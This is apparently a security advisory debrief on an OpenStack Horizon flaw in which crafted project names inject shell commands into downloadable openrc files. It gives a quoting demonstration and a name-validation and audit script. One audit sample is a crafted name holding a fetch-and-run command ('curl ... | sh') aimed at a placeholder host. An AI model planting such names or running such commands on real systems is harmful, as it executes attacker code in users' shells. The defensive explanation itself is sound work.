PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-55748 OpenStack CVE debrief

OpenStack Horizon versions before 25.7.4 generate the downloadable OpenStack RC (openrc) shell scripts with the project name embedded in a way that lets a crafted name containing shell metacharacters change what the script does. A project name built for this purpose is copied into the generated file, and the injected commands run in the shell of whoever sources the file. The OpenStack advisory describes the issue as a security hardening opportunity to address certain types of user error rather than a traditional vulnerability. The CVSS base score is 6.0, medium severity. Operators should upgrade and, until then, make sure project names cannot contain shell metacharacters; users should inspect a downloaded RC file before sourcing it.

Vendor
OpenStack
Product
Horizon
CVSS
MEDIUM 6.0
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-17
Original CVE updated
2026-06-17
Advisory published
2026-06-17
Advisory updated
2026-06-17

Who should care

Administrators and users of OpenStack Horizon, particularly in deployments where users or delegated admins can create or rename projects, should be aware of this issue. An account with the right to set a project name can craft one that, once embedded in the generated RC file, executes shell commands on the workstation of any user who downloads and sources that file.

Technical summary

The weakness is in the script generation for OpenStack RC file downloading in OpenStack Horizon. The project name is written into the generated shell script without neutralising characters the shell treats specially, so a name containing metacharacters such as `$(...)`, backticks, `;` or `"` becomes part of the script rather than a literal value. The Common Vulnerability Scoring System (CVSS) vector is CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L: the attacker needs high privileges (the ability to set a project name), a victim must interact (download and source the file), and the impact lands in the victim's shell with high confidentiality and integrity impact. The associated weakness is CWE-78, improper neutralisation of special elements used in an OS command (OS command injection).
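To make the mechanism concrete, the following added example (written for this debrief, not code from the Horizon project) renders a one-line stand-in for an openrc file two ways: interpolating the project name inside double quotes, where POSIX sh still expands `$(...)`, backticks and backslashes, and passing it through `shlex.quote()`, which single-quotes the value so nothing inside is expanded. The template, the variable name and the payload are assumptions for illustration; `source_and_read()` runs the rendered text through `sh` to show what actually ends up in the variable.

```python
import shlex
import subprocess

# Simplified stand-in for the openrc template (assumption; Horizon's real
# template is not reproduced here). Only the project-name line is shown.
UNSAFE_TEMPLATE = 'export OS_PROJECT_NAME="{project}"\n'
SAFE_TEMPLATE = 'export OS_PROJECT_NAME={project}\n'

# Constructed project name: looks like "demo" but carries a command
# substitution that runs when the RC file is sourced.
PAYLOAD = "demo$(echo INJECTED)"


def render_rc_unsafe(project_name: str) -> str:
    """Before: the name is dropped inside double quotes.  Double quotes do
    not stop $(...), `...` or \\ expansion, so the shell executes them."""
    return UNSAFE_TEMPLATE.format(project=project_name)


def render_rc_safe(project_name: str) -> str:
    """After: shlex.quote() wraps the value in single quotes and escapes any
    embedded single quote ('O'Neil' -> 'O'"'"'Neil').  POSIX sh performs no
    expansion inside single quotes, so the name stays a literal string."""
    return SAFE_TEMPLATE.format(project=shlex.quote(project_name))


def source_and_read(rc_text: str) -> str:
    """Source the rendered RC text in a fresh POSIX shell and return the
    resulting OS_PROJECT_NAME, i.e. what a victim's shell would hold."""
    script = rc_text + 'printf "%s" "$OS_PROJECT_NAME"\n'
    result = subprocess.run(
        ["sh", "-c", script], capture_output=True, text=True, check=True
    )
    return result.stdout


if __name__ == "__main__":
    for label, render in (("unsafe", render_rc_unsafe), ("safe", render_rc_safe)):
        rc = render(PAYLOAD)
        print(f"[{label}] generated line: {rc.strip()}")
        print(f"[{label}] value after sourcing: {source_and_read(rc)!r}")
```

With the unsafe rendering the command substitution runs at `export` time and the variable ends up as `demoINJECTED`; with `shlex.quote()` the variable holds the original string, metacharacters and all. The same quoting discipline applies to every field Horizon copies into the file, not only the project name.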

Defensive priority

Medium

Recommended defensive actions

  • Update OpenStack Horizon to version 25.7.4 or later, which is the fix; the remaining items reduce exposure until the upgrade is done
  • Restrict project names to alphanumeric characters and underscore, and reject names containing shell metacharacters at creation and rename time
  • Where the dashboard is customised or templated locally, quote every value written into the generated RC file rather than relying on name validation alone
  • Audit existing project names for shell metacharacters; a crafted name created before the upgrade is still present in every RC file that has already been downloaded
  • Monitor OpenStack Horizon and Keystone logs for project creations or renames that contain unusual characters
  • A Web Application Firewall can flag metacharacters in project-name fields, but it does not protect a user who sources a file that was generated from a name already stored
  • Tell users to inspect a downloaded RC file before sourcing it and to report names that look like shell syntax
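The two actions that operators can take without touching Horizon are an allowlist on new project names and an audit of the names already stored. The added example below (written for this debrief, not part of Horizon or any OpenStack client) implements both: `validate_project_name()` applies the alphanumeric-plus-underscore rule, and `audit_project_names()` scans a list of existing names for characters POSIX sh treats specially. The hyphen in the allowlist and the sample project list are assumptions; in practice the list would come from `openstack project list -f json` rather than the constructed values shown.

```python
import re

# Allowlist for new project names: alphanumeric and underscore as the
# debrief recommends, plus hyphen (assumption: most deployments use it).
ALLOWED_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Characters POSIX sh interprets unquoted or inside double quotes.  Any of
# these in a name means an RC file that embeds it unquoted is unsafe to
# source.  Whitespace is included because it splits words.
SHELL_META = re.compile(r"[$`\"'\\\s;&|<>(){}*?\[\]#~!]")


def validate_project_name(name: str) -> bool:
    """True when the name is acceptable for creation or rename."""
    return ALLOWED_NAME.fullmatch(name) is not None


def audit_project_names(names):
    """Return (name, offending characters) for every stored name that would
    be unsafe in a generated RC file, preserving input order."""
    findings = []
    for name in names:
        bad = "".join(sorted(set(SHELL_META.findall(name))))
        if bad:
            findings.append((name, bad))
    return findings


# Constructed sample of what a project listing might contain; the last two
# entries are crafted names of the kind this CVE is about.
SAMPLE_PROJECTS = [
    "admin",
    "prod-web",
    "research_2026",
    "O'Neil",
    "demo$(echo INJECTED)",
    'demo"; curl http://example.invalid/x | sh; #',
]

if __name__ == "__main__":
    for name in SAMPLE_PROJECTS:
        print(f"{'ok ' if validate_project_name(name) else 'BAD'} {name!r}")
    for name, bad in audit_project_names(SAMPLE_PROJECTS):
        print(f"review: {name!r} contains {bad!r}")
```

The audit deliberately flags more than the allowlist rejects: a name such as `O'Neil` is harmless in a single-quoted template but breaks one that uses double quotes, so it is worth reviewing even where the naming policy is later relaxed. Run the audit once after patching as well; the upgrade fixes future downloads, not files users already have.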

Evidence notes

The information provided is based on data from the National Vulnerability Database (NVD) and the Common Vulnerabilities and Exposures (CVE) database. The CVE record and NVD detail pages provide further information on this vulnerability.

Official resources

CVE-2026-55748 was published on 2026-06-17T15:17:02.503Z and modified on 2026-06-17T17:17:27.727Z.